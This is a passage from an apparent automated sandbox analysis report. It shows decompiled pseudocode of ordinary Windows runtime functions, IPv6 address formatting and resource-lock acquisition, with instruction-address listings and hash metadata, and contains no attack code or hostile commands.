								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00BE7707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00BE7707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00BE7707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}




















                                                                            0x00bf13d5
                                                                            0x00bf13d9
                                                                            0x00bf13dc
                                                                            0x00bf13de
                                                                            0x00bf13e1
                                                                            0x00bf13e8
                                                                            0x00bf13ee
                                                                            0x00c1e8fd
                                                                            0x00000000
                                                                            0x00c1e921
                                                                            0x00c1e921
                                                                            0x00c1e928
                                                                            0x00c1e982
                                                                            0x00c1e98a
                                                                            0x00000000
                                                                            0x00c1e99a
                                                                            0x00c1e99e
                                                                            0x00c1e9a3
                                                                            0x00c1e9a8
                                                                            0x00c1e9b9
                                                                            0x00c1e978
                                                                            0x00000000
                                                                            0x00c1e978
                                                                            0x00c1e98a
                                                                            0x00c1e92a
                                                                            0x00c1e931
                                                                            0x00c1e944
                                                                            0x00c1e944
                                                                            0x00c1e950
                                                                            0x00c1e954
                                                                            0x00c1e959
                                                                            0x00c1e95e
                                                                            0x00c1e963
                                                                            0x00c1e970
                                                                            0x00000000
                                                                            0x00c1e975
                                                                            0x00c1e93b
                                                                            0x00c1e980
                                                                            0x00000000
                                                                            0x00c1e980
                                                                            0x00c1e942
                                                                            0x00c1e94b
                                                                            0x00000000
                                                                            0x00c1e94b
                                                                            0x00000000
                                                                            0x00c1e942
                                                                            0x00bf13f4
                                                                            0x00bf13f4
                                                                            0x00bf13f9
                                                                            0x00bf13fc
                                                                            0x00bf13ff
                                                                            0x00bf1406
                                                                            0x00c1e9cc
                                                                            0x00c1e9d2
                                                                            0x00c1e9d2
                                                                            0x00c1e9cc
                                                                            0x00bf140c
                                                                            0x00bf1411
                                                                            0x00bf1431
                                                                            0x00bf143a
                                                                            0x00bf143c
                                                                            0x00bf143f
                                                                            0x00bf143f
                                                                            0x00bf1442
                                                                            0x00bf1447
                                                                            0x00bf14a8
                                                                            0x00bf14ac
                                                                            0x00c1e9e2
                                                                            0x00c1e9e7
                                                                            0x00c1e9ec
                                                                            0x00c1ea05
                                                                            0x00c1ea05
                                                                            0x00000000
                                                                            0x00bf1449
                                                                            0x00000000
                                                                            0x00bf1449
                                                                            0x00bf144c
                                                                            0x00bf1459
                                                                            0x00bf1462
                                                                            0x00bf1469
                                                                            0x00bf146a
                                                                            0x00bf1470
                                                                            0x00bf1473
                                                                            0x00bf1476
                                                                            0x00bf1476
                                                                            0x00bf1490
                                                                            0x00bf1495
                                                                            0x00bf138e
                                                                            0x00bf1390
                                                                            0x00bf1397
                                                                            0x00bf1398
                                                                            0x00bf1399
                                                                            0x00bf13a1
                                                                            0x00bf13a4
                                                                            0x00bf13a4
                                                                            0x00bf1498
                                                                            0x00bf149c
                                                                            0x00bf149f
                                                                            0x00bf14a2
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00bf14a4
                                                                            0x00000000
                                                                            0x00bf14a4
                                                                            0x00bf1413
                                                                            0x00bf1415
                                                                            0x00bf1416
                                                                            0x00bf1419
                                                                            0x00bf141c
                                                                            0x00bf1422
                                                                            0x00bf13b7
                                                                            0x00bf13bc
                                                                            0x00bf13bf
                                                                            0x00bf13bf
                                                                            0x00bf13c2
                                                                            0x00bf1424
                                                                            0x00bf1424
                                                                            0x00bf1424
                                                                            0x00bf1427
                                                                            0x00bf142b
                                                                            0x00bf142c
                                                                            0x00bf142c
                                                                            0x00bf142c
                                                                            0x00000000
                                                                            0x00bf141c
                                                                            0x00bf1411

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                            • API String ID: 48624451-2108815105
                                                                            • Opcode ID: be0f946cf7648386d484482a9e3dfca6a7817196b2cc7b55f698c7b12ade4225
                                                                            • Instruction ID: 30bfa8f5ea3bebc8c0f6838bbbc599f036876f69702964f86e9c4e090f80788d
                                                                            • Opcode Fuzzy Hash: be0f946cf7648386d484482a9e3dfca6a7817196b2cc7b55f698c7b12ade4225
                                                                            • Instruction Fuzzy Hash: 6C612671900659EACB24CF5EC8908FEBBF5EFD5300B14C8ADEA9687640D774AA44DB60
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BF0554, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 202COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 50%
                                                                            			E00BF0554(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int* _t49;
				signed int _t51;
				signed int _t56;
				signed int _t58;
				signed int _t61;
				signed int _t63;
				void* _t66;
				intOrPtr _t67;
				void* _t69;
				signed int _t70;
				void* _t75;
				signed int _t81;
				signed int _t84;
				void* _t86;
				signed int _t93;
				signed int _t96;
				intOrPtr _t105;
				signed int _t107;
				void* _t110;
				signed int _t115;
				signed int* _t119;
				void* _t125;
				void* _t126;
				signed int _t128;
				signed int _t130;
				signed int _t138;
				signed int _t144;
				void* _t158;
				void* _t159;
				void* _t160;

				_t96 = _a4;
				_t115 =  *(_t96 + 0x28);
				_push(_t138);
				if(_t115 < 0) {
					_t105 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t96 + 0x2c)) -  *((intOrPtr*)(_t105 + 0x24));
					if( *((intOrPtr*)(_t96 + 0x2c)) !=  *((intOrPtr*)(_t105 + 0x24))) {
						goto L6;
					} else {
						__eflags = _t115 | 0xffffffff;
						asm("lock xadd [eax], edx");
						return 1;
					}
				} else {
					L6:
					_push(_t128);
					while(1) {
						L7:
						__eflags = _t115;
						if(_t115 >= 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
							_t49 = _t96 + 0x1c;
							_t106 = 1;
							asm("lock xadd [edx], ecx");
							_t115 =  *(_t96 + 0x28);
							__eflags = _t115;
							if(_t115 < 0) {
								L23:
								_t130 = 0;
								__eflags = 0;
								while(1) {
									_t118 =  *(_t96 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t144 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c901c0;
									_push(_t144);
									_push(0);
									_t51 = L00BAF8CC( *((intOrPtr*)(_t96 + 0x18)));
									__eflags = _t51 - 0x102;
									if(_t51 != 0x102) {
										break;
									}
									_t106 =  *(_t144 + 4);
									_t126 =  *_t144;
									_t86 = L00BF4FC0(_t126,  *(_t144 + 4), 0xff676980, 0xffffffff);
									_push(_t126);
									_push(_t86);
									L00C03F92(0x65, 0, "RTL: Acquire Shared Sem Timeout %d(%I64u secs)\n", _t130);
									L00C03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
									_t130 = _t130 + 1;
									_t160 = _t158 + 0x28;
									__eflags = _t130 - 2;
									if(__eflags > 0) {
										E00C3217A(_t106, __eflags, _t96);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00C03F92();
									_t158 = _t160 + 0xc;
								}
								__eflags = _t51;
								if(__eflags < 0) {
									_push(_t51);
									L00BF3915(_t96, _t106, _t118, _t130, _t144, __eflags);
									asm("int3");
									while(1) {
										L32:
										__eflags = _a8;
										if(_a8 == 0) {
											break;
										}
										 *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t96 + 0x34)) + 0x14)) + 1;
										_t119 = _t96 + 0x24;
										_t107 = 1;
										asm("lock xadd [eax], ecx");
										_t56 =  *(_t96 + 0x28);
										_a4 = _t56;
										__eflags = _t56;
										if(_t56 != 0) {
											L40:
											_t128 = 0;
											__eflags = 0;
											while(1) {
												_t121 =  *(_t96 + 0x30) & 0x00000001;
												asm("sbb esi, esi");
												_t138 =  !( ~( *(_t96 + 0x30) & 1)) & 0x00c901c0;
												_push(_t138);
												_push(0);
												_t58 = L00BAF8CC( *((intOrPtr*)(_t96 + 0x20)));
												__eflags = _t58 - 0x102;
												if(_t58 != 0x102) {
													break;
												}
												_t107 =  *(_t138 + 4);
												_t125 =  *_t138;
												_t75 = L00BF4FC0(_t125, _t107, 0xff676980, 0xffffffff);
												_push(_t125);
												_push(_t75);
												L00C03F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t128);
												L00C03F92(0x65, 0, "RTL: Resource at %p\n", _t96);
												_t128 = _t128 + 1;
												_t159 = _t158 + 0x28;
												__eflags = _t128 - 2;
												if(__eflags > 0) {
													E00C3217A(_t107, __eflags, _t96);
												}
												_push("RTL: Re-Waiting\n");
												_push(0);
												_push(0x65);
												L00C03F92();
												_t158 = _t159 + 0xc;
											}
											__eflags = _t58;
											if(__eflags < 0) {
												_push(_t58);
												L00BF3915(_t96, _t107, _t121, _t128, _t138, __eflags);
												asm("int3");
												_t61 =  *_t107;
												 *_t107 = 0;
												__eflags = _t61;
												if(_t61 == 0) {
													L1:
													_t63 = E00BD5384(_t138 + 0x24);
													if(_t63 != 0) {
														goto L52;
													} else {
														goto L2;
													}
												} else {
													_t123 =  *((intOrPtr*)(_t138 + 0x18));
													_push( &_a4);
													_push(_t61);
													_t70 = L00BAF970( *((intOrPtr*)(_t138 + 0x18)));
													__eflags = _t70;
													if(__eflags >= 0) {
														goto L1;
													} else {
														_push(_t70);
														L00BF3915(_t96,  &_a4, _t123, _t128, _t138, __eflags);
														L52:
														_t122 =  *((intOrPtr*)(_t138 + 0x20));
														_push( &_a4);
														_push(1);
														_t63 = L00BAF970( *((intOrPtr*)(_t138 + 0x20)));
														__eflags = _t63;
														if(__eflags >= 0) {
															L2:
															return _t63;
														} else {
															_push(_t63);
															L00BF3915(_t96,  &_a4, _t122, _t128, _t138, __eflags);
															_t109 =  *((intOrPtr*)(_t138 + 0x20));
															_push( &_a4);
															_push(1);
															_t63 = L00BAF970( *((intOrPtr*)(_t138 + 0x20)));
															__eflags = _t63;
															if(__eflags >= 0) {
																goto L2;
															} else {
																_push(_t63);
																_t66 = L00BF3915(_t96, _t109, _t122, _t128, _t138, __eflags);
																asm("int3");
																while(1) {
																	_t110 = _t66;
																	__eflags = _t66 - 1;
																	if(_t66 != 1) {
																		break;
																	}
																	_t128 = _t128 | 0xffffffff;
																	_t66 = _t110;
																	asm("lock cmpxchg [ebx], edi");
																	__eflags = _t66 - _t110;
																	if(_t66 != _t110) {
																		continue;
																	} else {
																		_t67 =  *[fs:0x18];
																		 *((intOrPtr*)(_t138 + 0x2c)) =  *((intOrPtr*)(_t67 + 0x24));
																		return _t67;
																	}
																	goto L59;
																}
																E00BD5329(_t110, _t138);
																_t69 = E00BD53A5(_t138, 1);
																return _t69;
															}
														}
													}
												}
											} else {
												_t56 =  *(_t96 + 0x28);
												goto L3;
											}
										} else {
											_t107 =  *_t119;
											__eflags = _t107;
											if(__eflags > 0) {
												while(1) {
													_t81 = _t107;
													asm("lock cmpxchg [edi], esi");
													__eflags = _t81 - _t107;
													if(_t81 == _t107) {
														break;
													}
													_t107 = _t81;
													__eflags = _t81;
													if(_t81 > 0) {
														continue;
													}
													break;
												}
												_t56 = _a4;
												__eflags = _t107;
											}
											if(__eflags != 0) {
												while(1) {
													L3:
													__eflags = _t56;
													if(_t56 != 0) {
														goto L32;
													}
													_t107 = _t107 | 0xffffffff;
													_t56 = 0;
													asm("lock cmpxchg [edx], ecx");
													__eflags = 0;
													if(0 != 0) {
														continue;
													} else {
														 *((intOrPtr*)(_t96 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
														return 1;
													}
													goto L59;
												}
												continue;
											} else {
												goto L40;
											}
										}
										goto L59;
									}
									__eflags = 0;
									return 0;
								} else {
									_t115 =  *(_t96 + 0x28);
									continue;
								}
							} else {
								_t106 =  *_t49;
								__eflags = _t106;
								if(__eflags > 0) {
									while(1) {
										_t93 = _t106;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t93 - _t106;
										if(_t93 == _t106) {
											break;
										}
										_t106 = _t93;
										__eflags = _t93;
										if(_t93 > 0) {
											continue;
										}
										break;
									}
									__eflags = _t106;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L23;
								}
							}
						}
						goto L59;
					}
					_t84 = _t115;
					asm("lock cmpxchg [esi], ecx");
					__eflags = _t84 - _t115;
					if(_t84 != _t115) {
						_t115 = _t84;
						goto L7;
					} else {
						return 1;
					}
				}
				L59:
			}




































                                                                            0x00bf055a
                                                                            0x00bf055d
                                                                            0x00bf0563
                                                                            0x00bf0566
                                                                            0x00bf05d8
                                                                            0x00bf05e2
                                                                            0x00bf05e5
                                                                            0x00000000
                                                                            0x00bf05e7
                                                                            0x00bf05e7
                                                                            0x00bf05ea
                                                                            0x00bf05f3
                                                                            0x00bf05f3
                                                                            0x00bf0568
                                                                            0x00bf0568
                                                                            0x00bf0568
                                                                            0x00bf0569
                                                                            0x00bf0569
                                                                            0x00bf0569
                                                                            0x00bf056b
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c1217f
                                                                            0x00c12183
                                                                            0x00c1225b
                                                                            0x00c1225f
                                                                            0x00c12189
                                                                            0x00c1218c
                                                                            0x00c1218f
                                                                            0x00c12194
                                                                            0x00c12199
                                                                            0x00c1219d
                                                                            0x00c121a0
                                                                            0x00c121a2
                                                                            0x00c121ce
                                                                            0x00c121ce
                                                                            0x00c121ce
                                                                            0x00c121d0
                                                                            0x00c121d6
                                                                            0x00c121de
                                                                            0x00c121e2
                                                                            0x00c121e8
                                                                            0x00c121e9
                                                                            0x00c121ec
                                                                            0x00c121f1
                                                                            0x00c121f6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121f8
                                                                            0x00c121fb
                                                                            0x00c12206
                                                                            0x00c1220b
                                                                            0x00c1220c
                                                                            0x00c12217
                                                                            0x00c12226
                                                                            0x00c1222b
                                                                            0x00c1222c
                                                                            0x00c1222f
                                                                            0x00c12232
                                                                            0x00c12235
                                                                            0x00c12235
                                                                            0x00c1223a
                                                                            0x00c1223f
                                                                            0x00c12241
                                                                            0x00c12243
                                                                            0x00c12248
                                                                            0x00c12248
                                                                            0x00c1224d
                                                                            0x00c1224f
                                                                            0x00c12262
                                                                            0x00c12263
                                                                            0x00c12268
                                                                            0x00c12269
                                                                            0x00c12269
                                                                            0x00c12269
                                                                            0x00c1226d
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c12276
                                                                            0x00c12279
                                                                            0x00c1227e
                                                                            0x00c12283
                                                                            0x00c12287
                                                                            0x00c1228a
                                                                            0x00c1228d
                                                                            0x00c1228f
                                                                            0x00c122bc
                                                                            0x00c122bc
                                                                            0x00c122bc
                                                                            0x00c122be
                                                                            0x00c122c4
                                                                            0x00c122cc
                                                                            0x00c122d0
                                                                            0x00c122d6
                                                                            0x00c122d7
                                                                            0x00c122da
                                                                            0x00c122df
                                                                            0x00c122e4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122e6
                                                                            0x00c122e9
                                                                            0x00c122f4
                                                                            0x00c122f9
                                                                            0x00c122fa
                                                                            0x00c12305
                                                                            0x00c12314
                                                                            0x00c12319
                                                                            0x00c1231a
                                                                            0x00c1231d
                                                                            0x00c12320
                                                                            0x00c12323
                                                                            0x00c12323
                                                                            0x00c12328
                                                                            0x00c1232d
                                                                            0x00c1232f
                                                                            0x00c12331
                                                                            0x00c12336
                                                                            0x00c12336
                                                                            0x00c1233b
                                                                            0x00c1233d
                                                                            0x00c12350
                                                                            0x00c12351
                                                                            0x00c12356
                                                                            0x00c12359
                                                                            0x00c12359
                                                                            0x00c1235b
                                                                            0x00c1235d
                                                                            0x00bd5367
                                                                            0x00bd536b
                                                                            0x00bd5372
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c12363
                                                                            0x00c12363
                                                                            0x00c12369
                                                                            0x00c1236a
                                                                            0x00c1236c
                                                                            0x00c12371
                                                                            0x00c12373
                                                                            0x00000000
                                                                            0x00c12379
                                                                            0x00c12379
                                                                            0x00c1237a
                                                                            0x00c1237f
                                                                            0x00c1237f
                                                                            0x00c12385
                                                                            0x00c12386
                                                                            0x00c12389
                                                                            0x00c1238e
                                                                            0x00c12390
                                                                            0x00bd5378
                                                                            0x00bd537c
                                                                            0x00c12396
                                                                            0x00c12396
                                                                            0x00c12397
                                                                            0x00c1239c
                                                                            0x00c123a2
                                                                            0x00c123a3
                                                                            0x00c123a6
                                                                            0x00c123ab
                                                                            0x00c123ad
                                                                            0x00000000
                                                                            0x00c123b3
                                                                            0x00c123b3
                                                                            0x00c123b4
                                                                            0x00c123b9
                                                                            0x00c123ba
                                                                            0x00c123ba
                                                                            0x00c123bc
                                                                            0x00c123bf
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c09153
                                                                            0x00c09158
                                                                            0x00c0915a
                                                                            0x00c0915e
                                                                            0x00c09160
                                                                            0x00000000
                                                                            0x00c09166
                                                                            0x00c09166
                                                                            0x00c09171
                                                                            0x00c09176
                                                                            0x00c09176
                                                                            0x00000000
                                                                            0x00c09160
                                                                            0x00c123c6
                                                                            0x00c123ce
                                                                            0x00c123d7
                                                                            0x00c123d7
                                                                            0x00c123ad
                                                                            0x00c12390
                                                                            0x00c12373
                                                                            0x00c1233f
                                                                            0x00c1233f
                                                                            0x00000000
                                                                            0x00c1233f
                                                                            0x00c12291
                                                                            0x00c12291
                                                                            0x00c12293
                                                                            0x00c12295
                                                                            0x00c1229a
                                                                            0x00c122a1
                                                                            0x00c122a3
                                                                            0x00c122a7
                                                                            0x00c122a9
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122ab
                                                                            0x00c122ad
                                                                            0x00c122af
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122af
                                                                            0x00c122b1
                                                                            0x00c122b4
                                                                            0x00c122b4
                                                                            0x00c122b6
                                                                            0x00bd53be
                                                                            0x00bd53be
                                                                            0x00bd53be
                                                                            0x00bd53c0
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00bd53cb
                                                                            0x00bd53ce
                                                                            0x00bd53d0
                                                                            0x00bd53d4
                                                                            0x00bd53d6
                                                                            0x00000000
                                                                            0x00bd53d8
                                                                            0x00bd53e3
                                                                            0x00bd53ea
                                                                            0x00bd53ea
                                                                            0x00000000
                                                                            0x00bd53d6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c122b6
                                                                            0x00000000
                                                                            0x00c1228f
                                                                            0x00c12349
                                                                            0x00c1234d
                                                                            0x00c12251
                                                                            0x00c12251
                                                                            0x00000000
                                                                            0x00c12251
                                                                            0x00c121a4
                                                                            0x00c121a4
                                                                            0x00c121a6
                                                                            0x00c121a8
                                                                            0x00c121ac
                                                                            0x00c121b6
                                                                            0x00c121b8
                                                                            0x00c121bc
                                                                            0x00c121be
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121c0
                                                                            0x00c121c2
                                                                            0x00c121c4
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121c4
                                                                            0x00c121c6
                                                                            0x00c121c6
                                                                            0x00c121c8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x00c121c8
                                                                            0x00c121a2
                                                                            0x00000000
                                                                            0x00c12183
                                                                            0x00bf057b
                                                                            0x00bf057d
                                                                            0x00bf0581
                                                                            0x00bf0583
                                                                            0x00c12178
                                                                            0x00000000
                                                                            0x00bf0589
                                                                            0x00bf058f
                                                                            0x00bf058f
                                                                            0x00bf0583
                                                                            0x00000000

                                                                            APIs
                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C12206
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                            • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                            • API String ID: 885266447-4236105082
                                                                            • Opcode ID: 22153acd8f0e9687bc20a839677cc7d9518d9e6672fc7812111b56cbb47c69e3
                                                                            • Instruction ID: e7b4650807b0b2047c9d3b53b49c127e6ab86bf8292a0c7ccfe61590dc098b3d
                                                                            • Opcode Fuzzy Hash: 22153acd8f0e9687bc20a839677cc7d9518d9e6672fc7812111b56cbb47c69e3
                                                                            • Instruction Fuzzy Hash: 50515B357002426FEB14CA18CCC1FEA33E9AF95720F218269FD58DB2C6DA71ED919790
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BF14C0, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 64%
                                                                            			E00BF14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xc92088; // 0x752bba0c
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00BE7707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00BF13CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00BE7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00BE7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00BB2340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00BBE1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                                            0x00bf14c0
                                                                            0x00bf14cb
                                                                            0x00bf14d2
                                                                            0x00bf14d6
                                                                            0x00bf14da
                                                                            0x00bf14de
                                                                            0x00bf14e3
                                                                            0x00bf157a
                                                                            0x00bf157a
                                                                            0x00bf14f1
                                                                            0x00bf14f3
                                                                            0x00c1ea0f
                                                                            0x00000000
                                                                            0x00c1ea15
                                                                            0x00000000
                                                                            0x00c1ea15
                                                                            0x00bf14f9
                                                                            0x00bf14f9
                                                                            0x00bf14fe
                                                                            0x00bf1504
                                                                            0x00c1ea1a
                                                                            0x00c1ea1f
                                                                            0x00c1ea21
                                                                            0x00c1ea22
                                                                            0x00c1ea27
                                                                            0x00c1ea2a
                                                                            0x00c1ea2a
                                                                            0x00bf1515
                                                                            0x00bf1517
                                                                            0x00bf156d
                                                                            0x00bf1572
                                                                            0x00bf1575
                                                                            0x00bf1575
                                                                            0x00bf151e
                                                                            0x00c1ea50
                                                                            0x00c1ea55
                                                                            0x00c1ea58
                                                                            0x00c1ea58
                                                                            0x00bf152e
                                                                            0x00bf1531
                                                                            0x00bf1533
                                                                            0x00000000
                                                                            0x00bf1535
                                                                            0x00bf1541
                                                                            0x00bf1549
                                                                            0x00bf1549
                                                                            0x00bf1533
                                                                            0x00bf14f3
                                                                            0x00bf1559

                                                                            APIs
                                                                            • ___swprintf_l.LIBCMT ref: 00C1EA22
                                                                              • Part of subcall function 00BF13CB: ___swprintf_l.LIBCMT ref: 00BF146B
                                                                              • Part of subcall function 00BF13CB: ___swprintf_l.LIBCMT ref: 00BF1490
                                                                            • ___swprintf_l.LIBCMT ref: 00BF156D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.460328831.0000000000BA0000.00000040.00000001.sdmp, Offset: 00B90000, based on PE: true
                                                                            • Associated: 00000005.00000002.460311683.0000000000B90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460461002.0000000000C80000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460493201.0000000000C90000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460525117.0000000000C94000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460563735.0000000000C97000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460596140.0000000000CA0000.00000040.00000001.sdmp Download File
                                                                            • Associated: 00000005.00000002.460679568.0000000000D00000.00000040.00000001.sdmp Download File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_b90000_medicomsh78694.jbxd
                                                                            Similarity
                                                                            • API ID: ___swprintf_l
                                                                            • String ID: %%%u$]:%u
                                                                            • API String ID: 48624451-3050659472
                                                                            • Opcode ID: 12dd0f3324beab572a187e7ce7656837561edc148f5b6515a60ebbc41577367e
                                                                            • Instruction ID: 14ec184009809b663bac8c9a13f09f193422f1af5559ec8131fd97b2e3e426f3
                                                                            • Opcode Fuzzy Hash: 12dd0f3324beab572a187e7ce7656837561edc148f5b6515a60ebbc41577367e
                                                                            • Instruction Fuzzy Hash: 8D21807290021DEBCB21DE58CC41AFE77ECEB60700F5449A5EE56E3140DB70DA588BE1
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00BD53A5, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 45%
                                                                            			E00BD53A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
